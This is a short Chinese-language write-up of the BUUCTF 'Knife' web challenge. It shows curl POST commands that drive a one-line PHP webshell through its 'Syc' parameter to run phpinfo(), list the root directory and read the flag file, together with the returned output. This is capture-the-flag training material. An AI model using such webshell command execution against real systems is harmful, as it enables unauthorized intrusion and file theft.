[BUUCTF][WEB][极客大挑战 2019]Knife 1

这题几乎是送分

题目不断暗示，后台存在一句话木马

拿个蚁剑连上去就完事了

这里用curl 连上去，演示一下，理解一下其中的原理

#注意 phpinfo() 后面的分号不能省
curl  -d "Syc=phpinfo();" http://32a31ff6-2815-4485-a74e-e646f675808d.node4.buuoj.cn:81/

在构造一个来试试，查看文件

curl  -d "Syc=system('ls /');" http://32a31ff6-2815-4485-a74e-e646f675808d.node4.buuoj.cn:81/

返回

<html>

bin
boot
data
dev
etc
flag   #注意这里
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var

......

再次构造

curl  -d "Syc=system('cat /flag');" http://32a31ff6-2815-4485-a74e-e646f675808d.node4.buuoj.cn:81/

boom

得到flag ： flag{52a4a837-7d3d-46b9-9d5f-7aa403fe7ad1}